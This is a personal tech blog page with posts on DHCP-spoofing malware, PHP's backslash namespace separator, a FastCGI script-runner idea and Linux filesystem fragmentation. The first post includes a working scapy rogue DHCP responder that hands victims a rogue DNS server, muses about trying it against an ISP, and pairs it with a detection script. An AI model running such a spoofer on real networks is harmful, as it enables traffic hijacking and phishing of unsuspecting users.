Personal.X-Istence.com

Bert JW Regeer (畢傑龍)

Rogue DHCP servers -- Malware becomes more sophisticated

An idea that has been floating around in my head for a while has finally come true in the real world. Ever since I experimented with ettercap almost two years ago, I have been wondering how long it would take before the idea of beating a DHCP server in a race condition would be implemented on a wider scale to run phishing attacks against entire ISPs.

Luckily it is not that bad yet. However, according to the SANS Internet Storm Center, there is a new DNS-changing piece of malware that installs a TCP/IP driver in Windows to gain raw packet access, sets up a listener, and emulates a DHCP server. Whenever it sees a DHCP request it sends its own reply, hopefully before the real DHCP server gets a chance to do so, and sets the client's DNS resolver IPs to servers located in Ukraine.
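To make the race concrete, here is roughly what such a rogue responder looks like, sketched with the Python scapy packet library. The interface and every address below are placeholders, and this is a lab-network illustration of the technique, not the actual malware:

    # Sketch: answer DHCP DISCOVERs before the real server does, handing
    # out a lease whose DNS option points at a resolver we control.
    # Requires root; interface and addresses are placeholders.
    from scapy.all import sniff, sendp, Ether, IP, UDP, BOOTP, DHCP

    IFACE      = "eth0"
    SERVER_IP  = "192.168.1.1"      # address we claim as the DHCP server
    OFFERED_IP = "192.168.1.200"    # lease handed to the victim
    ROGUE_DNS  = "192.0.2.53"       # the "evil" resolver

    def race(pkt):
        # option 53 (message-type) == 1 means DHCPDISCOVER
        if DHCP not in pkt or ("message-type", 1) not in pkt[DHCP].options:
            return
        offer = (Ether(dst=pkt[Ether].src) /
                 IP(src=SERVER_IP, dst="255.255.255.255") /
                 UDP(sport=67, dport=68) /
                 BOOTP(op=2, xid=pkt[BOOTP].xid, yiaddr=OFFERED_IP,
                       siaddr=SERVER_IP, chaddr=pkt[BOOTP].chaddr) /
                 DHCP(options=[("message-type", "offer"),
                               ("server_id", SERVER_IP),
                               ("lease_time", 3600),
                               ("subnet_mask", "255.255.255.0"),
                               ("router", SERVER_IP),
                               ("name_server", ROGUE_DNS),  # the payload
                               "end"]))
        sendp(offer, iface=IFACE, verbose=False)

    sniff(filter="udp and (port 67 or port 68)", prn=race, iface=IFACE)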

Very interesting. How secure are ISPs against these types of attacks? Could I set up a fake DHCP server on my outbound connection and reply to DHCP packets? Food for thought.
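The flip side is that a rogue server is just as easy to spot from the wire, since legitimate DHCP offers should only ever come from a known set of addresses. A rough sketch of such a watcher, again with scapy and a placeholder allowlist:

    # Sketch: flag DHCP offers that do not come from a legitimate server.
    from scapy.all import sniff, DHCP, IP

    KNOWN_SERVERS = {"192.168.1.1"}   # placeholder: the real DHCP server(s)

    def check(pkt):
        # option 53 (message-type) == 2 means DHCPOFFER
        if DHCP in pkt and ("message-type", 2) in pkt[DHCP].options:
            if pkt[IP].src not in KNOWN_SERVERS:
                print("Rogue DHCP offer from %s" % pkt[IP].src)

    sniff(filter="udp and src port 67", prn=check)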

Rogue DHCP servers article at SANS

Namespace resolution in PHP has changed from :: to \

That is not a typo. The new way that PHP wants you to use namespaces is as follows:

namespace\class

Yeah, that is ridiculous, but it seems it was decided over a lengthy IRC discussion with a follow-up email to PHP internals.

There are already people blogging in protest of this change, which seems utterly backwards. \ is generally used to denote that the character following it is escaped, and newcomers already have enough trouble as it is understanding the different escape sequences.
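The objection is easy to demonstrate in any language with C-style escape sequences; in Python, for example, a backslash-separated name quietly corrupts itself:

    # \n and \t in the literal below silently become control characters,
    # the same confusion PHP source will now invite around namespace names.
    print("app\names\types")    # prints "app", a newline, "ames", a tab, "ypes"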

:: as the namespace resolution operator is ingrained in my brain, mostly from C++, and \ just does not work for me at all.

There is a wiki page for the "RFC" at http://wiki.php.net/rfc/namespaceseparator. This is going to slowly cause the decline and death of PHP.

In other news, I am now looking for a new web programming language that is much like PHP, can do FastCGI, and has the FastCGI backend execute whatever files the server hands it, rather than something like the long-running Python processes that serve one single app only.
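Something along these lines is what I am after, sketched here with Python's flup FastCGI library. The SCRIPT_FILENAME dispatch and the render() convention are assumptions of mine for illustration, not an existing framework:

    # Sketch: one FastCGI responder that executes whatever script the web
    # server hands it, PHP-style, instead of one long-running application.
    from flup.server.fcgi import WSGIServer

    def app(environ, start_response):
        script = environ.get("SCRIPT_FILENAME", "")
        try:
            scope = {}
            exec(open(script).read(), scope)    # run the file fresh on every request
            body = scope["render"](environ)     # hypothetical entry point each script defines
            start_response("200 OK", [("Content-Type", "text/html")])
        except Exception:
            body = "Could not run %s\n" % script
            start_response("500 Internal Server Error", [("Content-Type", "text/plain")])
        return [body]

    WSGIServer(app).run()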

Why all the fragmentation?

This is something that has bothered me about open source in general for a while now: why is there so much fragmentation? So many wheels being re-implemented for the sake of being re-implemented? I agree that a new file system supporting all the new features of btrfs and ZFS is required; at the same time I don't understand all of this duplication. ZFS has some features that btrfs does not have, and vice versa. Why not spend the time developing a hybrid of the two, thereby massively increasing the usability and stability of both products -- or rather, of just one product, since all the time and effort would be put into the hybrid?

If it is possible for Nvidia to ship binary blobs for their graphics cards, it should be possible to use CDDL code with a compatibility shim in the Linux kernel. All this duplicated effort could instead be focused on one project, resulting in an all-around better file system. btrfs has only recently started coming to fruition; would that time not be better spent improving ZFS?

It seems that licensing issues are the only thing causing all of this trouble in the first place. As a user of a system I don't want to spend valuable time testing all the various file systems, and I don't want to have to support every file system that is available. With a project as large as Linux, and the number of file systems it offers, how can it be guaranteed that the file system I ultimately go with has been properly bug-tested, has had proper code review done, and is not going to be shoved aside for the next shiny new file system that comes along?

As an end user (and by that I do not mean the home user group) I want stability. FreeBSD gives me UFS2: I know I can depend on it, I know it will still exist tomorrow, and I know it is still being worked on for performance and general improvements; ZFS has recently been imported and will be around for a long time. OpenSolaris gives me UFS and ZFS; I know they are going to be around, and I know they are going to be improved. Linux gives me XFS, JFS, ext2, ext3, ext4, ReiserFS, Reiser4, and now btrfs. Depending on my workload and whom I ask, I get told to use a different file system every time. Individually testing each and every one would be time-consuming and error-prone; instead of all of these different file systems, make one unified file system.

For that reason, and that reason alone, I use FreeBSD 7.0 and Solaris 10 on my servers. Stability is a good thing: I need some way to assure my clients that there is a reasonable schedule for new releases, that what they are storing their data on right now is going to be around tomorrow, and that it is stable, time-proven, and tested. Linux cannot provide that at the moment.